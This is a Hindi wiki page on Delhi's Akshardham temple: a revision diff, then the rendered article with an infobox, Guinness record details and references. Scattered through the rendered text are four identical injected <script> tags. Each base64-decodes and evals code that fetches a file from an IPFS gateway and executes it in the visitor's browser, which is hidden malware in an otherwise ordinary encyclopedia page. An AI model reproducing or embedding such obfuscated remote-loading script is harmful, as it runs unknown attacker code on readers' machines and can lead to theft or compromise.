Difference between revisions of "अक्षरधाम मंदिर दिल्ली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][checked revision]
('thumb|अक्षरधाम मंदिर, [[दिल्ली|250px]] [[दिल...' के साथ नया पन्ना बनाया)
 
(9 intermediate revisions by 3 users not shown)
Line 1: Line 1:
[[चित्र:Akshardham-Temple-Delhi.jpg|thumb|अक्षरधाम मंदिर, [[दिल्ली]]|250px]]
+
{{बहुविकल्प|बहुविकल्पी शब्द=अक्षरधाम मंदिर |लेख का नाम=अक्षरधाम मंदिर (बहुविकल्पी)}}
[[दिल्ली]] का अक्षरधाम मंदिर बाकी इमारतों की तरह प्राचीन नहीं है लेकिन जिस अंदाज में इसकी लोकप्रियता फैली है उसने इसे दिल्ली के अहम दर्शनीय स्थलों में शुमार करा दिया है। स्वामिनारायण अक्षरधाम मंदिर एक अनोखा सांस्कृतिक तीर्थ है। इसे ज्योतिर्धर भगवान स्वामिनारायण की याद में बनवाया गया है। यह परिसर 100 एकड़ भूमि में फैला हुआ है।<ref>{{cite web |url= http://jagranyatra.jagranjunction.com/2010/09/25/akshardham-mandir-delhi-commonwealth-games/ |title=दिल्ली : राजधानी की शान के चंद नगीने 4 |accessmonthday=[[14 मार्च]] |accessyear=[[2011]] |last= |first= |authorlink= |format=पी.एच.पी |publisher= |language=[[हिन्दी]] }}</ref> दिल्ली स्थित प्रसिद्ध अक्षरधाम मंदिर को दुनिया का सबसे विशाल हिंदू मंदिर परिसर होने के नाते गिनीज बुक आफ व‌र्ल्ड रिका‌र्ड्स में शामिल कर लिया गया है। गिनीज बुक आफ व‌र्ल्ड रिका‌र्ड्स के एक वरिष्ठ अधिकारी पिछले सप्ताह [[भारत]] की यात्रा पर आए और स्वामी नारायण संस्थान के प्रमुख स्वामी महाराज को विश्व रिकार्ड संबंधी दो प्रमाणपत्र भेंट किए। प्रमाणपत्र में कहा गया है, पूज्य प्रमुख स्वामी महाराज अंतरराष्ट्रीय ख्यातिप्राप्त आध्यात्मिक नेता हैं और बीएपीएस स्वामीनारायण संस्थान के प्रमुख हैं। उन्होंने अप्रैल [[1971]] से नवंबर [[2007]] के बीच पांच महाद्वीपों में 713 मंदिरों का निर्माण करने का विश्व रिकार्ड बनाया है। इसमें साथ ही कहा गया है कि इनमें से दिल्ली का बीएपीएस स्वामीनारायण अक्षरधाम मंदिर अद्भुत है और दुनिया का विशालतम हिंदू मंदिर परिसर है। माइकल विटी ने कहा कि हमें अक्षरधाम की व्यापक वास्तुशिल्प योजना का अध्ययन तथा अन्य मंदिर परिसरों से उसकी तुलना परिसर का दौरा और निरीक्षण करने में तीन माह का समय लगा और उसके बाद हम इस नतीजे पर पहुंचे कि मंदिर गिनीज बुक में शामिल किए जाने का अधिकारी है। दिल्ली स्थित अक्षरधाम मंदिर 86342 वर्ग फुट परिसर में फैला है। यह 356 फुट लंबा 316 फुट चौड़ा तथा 141 फुट ऊंचा है। यह पहला मौका  है जब गिनीज बुक ने अपने विशाल धार्मिक स्थलों की सूची में किसी हिंदू  मंदिर को मान्यता प्रदान की है। <ref>{{cite web |url= http://apnamat.blogspot.com/2007/12/blog-post_2435.html |title=अक्षरधाम दुनिया का सबसे विशाल हिंदू मंदिर परिसर |accessmonthday=[[14 मार्च]] |accessyear=[[2011]] |last= |first= |authorlink= |format=पी.एच.पी |publisher= |language=[[हिन्दी]] }}</ref>  
+
{{सूचना बक्सा मन्दिर
 +
|चित्र=Akshardham-Temple-Delhi.jpg
 +
|चित्र का नाम=अक्षरधाम मंदिर
 +
|वर्णन=दिल्ली स्थित अक्षरधाम मंदिर 86342 वर्ग फुट परिसर में फैला है।
 +
|स्थान=[[दिल्ली]]
 +
|निर्माता=प्रमुख स्वामीमहाराज
 +
|जीर्णोद्धारक=
 +
|निर्माण काल=6 नवंबर, 2005
 +
|देवी-देवता=स्वामीनारायण
 +
|वास्तुकला=
 +
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=28.613986,77.277703&t=m&z=19&vpsrc=0 उत्तर-28° 36′ 50.35″,  पूर्व- 77°16′ 39.73″]  
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=अक्षरधाम मंदिर को दुनिया का सबसे विशाल हिन्दू मंदिर परिसर होने के नाते 'गिनीज बुक आफ व‌र्ल्ड रिका‌र्ड्स' में शामिल कर लिया गया है।
 +
|बाहरी कड़ियाँ=[http://www.akshardham.com/ आधिकारिक वेबसाइट]  
 +
|अद्यतन=
 +
}}
 +
[[दिल्ली]] का '''अक्षरधाम मंदिर''' बाकी इमारतों की तरह प्राचीन नहीं है लेकिन जिस अंदाज में इसकी लोकप्रियता फैली है उसने इसे दिल्ली के अहम दर्शनीय स्थलों में शुमार करा दिया है। स्वामीनारायण अक्षरधाम मंदिर एक अनोखा सांस्कृतिक तीर्थ है। इसे ज्योतिर्धर भगवान स्वामिनारायण की याद में बनवाया गया है। यह परिसर 100 एकड़ भूमि में फैला हुआ है।<ref>{{cite web |url= http://jagranyatra.jagranjunction.com/2010/09/25/akshardham-mandir-delhi-commonwealth-games/ |title=दिल्ली : राजधानी की शान के चंद नगीने 4 |accessmonthday=[[14 मार्च]] |accessyear=[[2011]] |last= |first= |authorlink= |format=पी.एच.पी |publisher=जागरण जंक्शन |language=[[हिन्दी]] }}</ref>  
 +
==प्रसिद्धि==
 +
प्रसिद्ध 'अक्षरधाम मंदिर' को दुनिया का सबसे विशाल [[हिन्दू]] मंदिर परिसर होने के नाते 'गिनीज़ बुक ऑफ़ॅ व‌र्ल्ड रिका‌र्ड्स' में शामिल कर लिया गया है। गिनीज़ बुक ऑफ़ व‌र्ल्ड रिका‌र्ड्स के एक वरिष्ठ अधिकारी पिछले सप्ताह [[भारत]] की यात्रा पर आए और स्वामीनारायण संस्थान के प्रमुख स्वामी महाराज को विश्व रिकार्ड संबंधी दो प्रमाणपत्र भेंट किए। प्रमाणपत्र में कहा गया है, पूज्य प्रमुख स्वामी महाराज अंतरराष्ट्रीय ख्यातिप्राप्त आध्यात्मिक नेता हैं और 'बीएपीएस स्वामीनारायण संस्थान' के प्रमुख हैं। उन्होंने अप्रैल [[1971]] से नवंबर [[2007]] के बीच पांच महाद्वीपों में 713 मंदिरों का निर्माण करने का विश्व रिकार्ड बनाया है। इसमें साथ ही कहा गया है कि इनमें से [[दिल्ली]] का 'बीएपीएस स्वामीनारायण अक्षरधाम मंदिर' अद्भुत है और दुनिया का विशालतम हिन्दू मंदिर परिसर है। माइकल विटी ने कहा कि हमें अक्षरधाम की व्यापक वास्तुशिल्प योजना का अध्ययन तथा अन्य मंदिर परिसरों से उसकी तुलना परिसर का दौरा और निरीक्षण करने में तीन माह का समय लगा और उसके बाद हम इस नतीजे पर पहुंचे कि मंदिर गिनीज बुक में शामिल किए जाने का अधिकारी है।<ref name="chin" />
 +
==विशेषता==
 +
दिल्ली स्थित अक्षरधाम मंदिर 86342 वर्ग फुट परिसर में फैला है। यह 356 फुट लंबा 316 फुट चौड़ा तथा 141 फुट ऊंचा है। यह पहला मौक़ा है जब गिनीज़ बुक ने अपने विशाल धार्मिक स्थलों की सूची में किसी [[हिन्दू]] मंदिर को मान्यता प्रदान की है।<ref name="chin">{{cite web |url= http://apnamat.blogspot.com/2007/12/blog-post_2435.html |title=अक्षरधाम दुनिया का सबसे विशाल हिन्दू मंदिर परिसर |accessmonthday=[[14 मार्च]] |accessyear=[[2011]] |last= |first= |authorlink= |format=पी.एच.पी |publisher=चिंतन |language=[[हिन्दी]] }}</ref>  
  
 
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
|प्रारम्भिक=प्रारम्भिक1
+
|प्रारम्भिक=प्रारम्भिक2
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 24: Line 47:
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__
 +
{{सुलेख}}

Revision as of 10:53, 1 February 2012

chitr:Disamb2.jpg aksharadham mandir ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- aksharadham mandir (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

aksharadham mandir dilli
varnan dilli sthit aksharadham mandir 86342 varg phut parisar mean phaila hai.
sthan dilli
nirmata pramukh svamimaharaj
nirman kal 6 navanbar, 2005
devi-devata svaminarayan
bhaugolik sthiti uttar-28° 36′ 50.35″, poorv- 77°16′ 39.73″
any janakari aksharadham mandir ko duniya ka sabase vishal hindoo mandir parisar hone ke nate 'ginij buk aph v‌rld rika‌rds' mean shamil kar liya gaya hai.
bahari k diyaan adhikarik vebasait

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

dilli ka aksharadham mandir baki imaratoan ki tarah prachin nahian hai lekin jis aandaj mean isaki lokapriyata phaili hai usane ise dilli ke aham darshaniy sthaloan mean shumar kara diya hai. svaminarayan aksharadham mandir ek anokha saanskritik tirth hai. ise jyotirdhar bhagavan svaminarayan ki yad mean banavaya gaya hai. yah parisar 100 ek d bhoomi mean phaila hua hai.[1]

prasiddhi

prasiddh 'aksharadham mandir' ko duniya ka sabase vishal hindoo mandir parisar hone ke nate 'giniz buk aaufॅ v‌rld rika‌rds' mean shamil kar liya gaya hai. giniz buk aauf v‌rld rika‌rds ke ek varishth adhikari pichhale saptah bharat ki yatra par ae aur svaminarayan sansthan ke pramukh svami maharaj ko vishv rikard sanbandhi do pramanapatr bheant kie. pramanapatr mean kaha gaya hai, poojy pramukh svami maharaj aantararashtriy khyatiprapt adhyatmik neta haian aur 'biepies svaminarayan sansthan' ke pramukh haian. unhoanne aprail 1971 se navanbar 2007 ke bich paanch mahadvipoan mean 713 mandiroan ka nirman karane ka vishv rikard banaya hai. isamean sath hi kaha gaya hai ki inamean se dilli ka 'biepies svaminarayan aksharadham mandir' adbhut hai aur duniya ka vishalatam hindoo mandir parisar hai. maikal viti ne kaha ki hamean aksharadham ki vyapak vastushilp yojana ka adhyayan tatha any mandir parisaroan se usaki tulana parisar ka daura aur nirikshan karane mean tin mah ka samay laga aur usake bad ham is natije par pahuanche ki mandir ginij buk mean shamil kie jane ka adhikari hai.[2]

visheshata

dilli sthit aksharadham mandir 86342 varg phut parisar mean phaila hai. yah 356 phut lanba 316 phut chau da tatha 141 phut ooancha hai. yah pahala mauqa hai jab giniz buk ne apane vishal dharmik sthaloan ki soochi mean kisi hindoo mandir ko manyata pradan ki hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. dilli : rajadhani ki shan ke chand nagine 4 (hindi) (pi.ech.pi) jagaran jankshan. abhigaman tithi: 14 march, 2011.
  2. 2.0 2.1 aksharadham duniya ka sabase vishal hindoo mandir parisar (hindi) (pi.ech.pi) chiantan. abhigaman tithi: 14 march, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


suvyavasthit lekh|link=bharatakosh:suvyavasthit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>